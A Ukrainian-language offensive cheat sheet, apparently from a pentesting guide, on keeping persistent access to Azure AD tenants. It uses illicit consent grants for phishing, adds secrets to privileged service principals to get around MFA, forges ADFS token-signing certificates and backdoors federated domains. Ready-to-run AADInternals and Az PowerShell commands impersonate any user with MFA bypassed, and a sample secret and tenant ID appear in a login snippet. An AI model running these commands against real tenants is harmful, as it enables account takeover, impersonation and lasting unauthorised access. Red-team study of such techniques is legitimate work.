Az - Persistence

Illicit Consent Grant

За замовчуванням будь-який користувач може зареєструвати додаток в Azure AD. Тому ви можете зареєструвати додаток (тільки для цільового орендаря), який потребує дозволів з високим впливом з адміністративним погодженням (схвалити його, якщо ви адміністратор) - наприклад, надсилання електронної пошти від імені користувача, управління ролями тощо. Це дозволить нам виконувати фішингові атаки, які будуть дуже прибутковими у разі успіху.

Більше того, ви також можете прийняти цей додаток зі своїм користувачем як спосіб підтримувати доступ до нього.

Applications and Service Principals

З привілеями адміністратора додатків, GA або користувацькою роллю з дозволами microsoft.directory/applications/credentials/update, ми можемо додати облікові дані (секрет або сертифікат) до існуючого додатку.

Можливо націлити додаток з високими дозволами або додати новий додаток з високими дозволами.

Цікавою роллю, яку можна додати до додатку, була б роль адміністратора привілейованої аутентифікації, оскільки вона дозволяє скидати пароль глобальних адміністраторів.

Ця техніка також дозволяє обійти MFA.

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a

• Для аутентифікації на основі сертифікатів

Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>

Федерація - Сертифікат підпису токена

З привілеями DA на локальному AD можливо створити та імпортувати нові сертифікати підпису токена та сертифікати розшифровки токена, які мають дуже тривалий термін дії. Це дозволить нам увійти як будь-який користувач, чий ImuutableID ми знаємо.

Виконайте нижче наведений команду як DA на сервері ADFS для створення нових сертифікатів (за замовчуванням пароль 'AADInternals'), додайте їх до ADFS, вимкніть автоматичне оновлення та перезапустіть службу:

New-AADIntADFSSelfSignedCertificates

Тоді оновіть інформацію про сертифікат з Azure AD:

Update-AADIntADFSFederationSettings -Domain cyberranges.io

Federation - Trusted Domain

З привілеями GA в орендаря можливо додати новий домен (повинен бути перевірений), налаштувати його тип аутентифікації на Федеративний та налаштувати домен для довіри до конкретного сертифіката (any.sts у наведеній нижче команді) та видавця:

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

References

• https://aadinternalsbackdoor.azurewebsites.net/